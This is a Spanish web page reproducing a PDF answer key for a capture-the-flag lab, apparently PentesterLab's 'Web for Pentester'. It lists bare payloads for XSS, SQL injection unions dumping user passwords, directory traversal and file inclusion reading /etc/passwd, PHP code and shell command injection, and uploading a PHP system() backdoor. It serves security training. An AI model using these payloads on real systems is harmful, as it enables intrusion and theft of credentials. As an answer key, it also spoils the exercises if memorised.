Iniciar sesiónCerrar
Correo:
Contraseña:
Entrar
Recordar sesión en este navegador
Iniciar sesiónIniciar sesiónCrear cuentaCrear cuenta
LWP » PDFs de programación » Soluciones para el CTF 1

PDF de programación - Soluciones para el CTF 1

Volver
<<>>
Imágen de pdf Soluciones para el CTF 1

Soluciones para el CTF 1gráfica de visualizaciones

Publicado el 12 de Septiembre del 2018
519 visualizaciones desde el 12 de Septiembre del 2018
386,7 KB
2 paginas
Creado hace 10a (20/11/2013)
Soluciones para el CTF 1

XSS:

















Ejercicio 1: <script>alert(123)</script>

Ejercicio 2: <SCRIPT>alert(123)</SCRIPT>

Ejercicio 3: <iframe src="javascript:alert(123)"></iframe>

Ejercicio 4: <a onmouseover="alert(123)"> XSS</a>

Ejercicio 5: <a onmouseover="prompt(123)"> XSS</a>

Ejercicio 6: </script><script>alert(123)</script>

Ejercicio 7: ';alert(123);var+$a='hacker

Ejercicio 9: #hacker<script>alert(123)</script>



SQL Injection:



Ejercicio 1:



' and 1=0 union select id,name,passwd,4,5 from users where '1'='1



Ejercicio 2:



‘/**/and/**/1=0/**/union/**/select/**/id,name,
passwd,4,5/**/from/**/users/**/where/**/'1'='1

Ejercicio 3: Igual que el 2

Ejercicio 4:



2 and 1=0 union select id,name,passwd,4,5 from users

Ejercicio 5: Igual que el 4

Ejercicio 6:



2 and 1=0 union select id,name,passwd,4,5 from users where 1=1













Directory Traversal:







Ejercicio 1: /dirtrav/example1.php?file=../../../../../../../../etc/passwd

Ejercicio 2: /dirtrav/example2.php?file=/var/www/files/../../../etc/passwd

Ejercicio 3: /dirtrav/example3.php?file=../../../../../../../etc/passwd%00

File Include:

Ejercicio 1: /fileincl/example1.php?page=/etc/passwd

Ejercicio 2: /fileincl/example2.php?page=/etc/passwd%00







Code Injection:

Ejercicio 1: ".system('uname+-a')."

Ejercicio 2: id);}system('uname+-a');//



Ejercicio 3: '.system('uname+-a').'









Command Injection:

Ejercicio 1: 127.0.0.1;echo+"\n\nUname:";uname+-a

Ejercicio 2: 127.0.0.1%0Aecho+"\n\nUname:";uname+-a

Ejercicio 3:



nc IP_victima 80

GET /commandexec/example3.php?ip=127.0.0.1|úname+-a HTTP/1.0









File Upload:



Ejercicio 1: Subimos un archivo .php con una backdoor muy simple utilizando la
función system.



Ejercicio 2: Subimos el mismo archivo pero lo renombramos como .php3



Se queréis mas información sobre como descubrir y llegar a hallar las diferentes
vulnerabilidades podéis verlo en el siguiente PDF:
http://files.pentesterlab.com/web_for_pentester/web_for_pentester.pdf



Si tenéis cualquier tipo de duda poneros en contacto con nosotros en la dirección de
correo [email protected].
  • Links de descarga
http://lwp-l.com/pdf13458

Comentarios de: Soluciones para el CTF 1 (0)


No hay comentarios
 

Comentar...

Nombre
Correo (no se visualiza en la web)
Valoración
Comentarios...
CerrarCerrar
CerrarCerrar
Cerrar

Tienes que ser un usuario registrado para poder insertar imágenes, archivos y/o videos.

Puedes registrarte o validarte desde aquí.

Codigo
Negrita
Subrayado
Tachado
Cursiva
Insertar enlace
Imagen externa
Emoticon
Tabular
Centrar
Titulo
Linea
Disminuir
Aumentar
Vista preliminar
sonreir
dientes
lengua
guiño
enfadado
confundido
llorar
avergonzado
sorprendido
triste
sol
estrella
jarra
camara
taza de cafe
email
beso
bombilla
amor
mal
bien
Es necesario revisar y aceptar las políticas de privacidad
Acepto las políticas de privacidad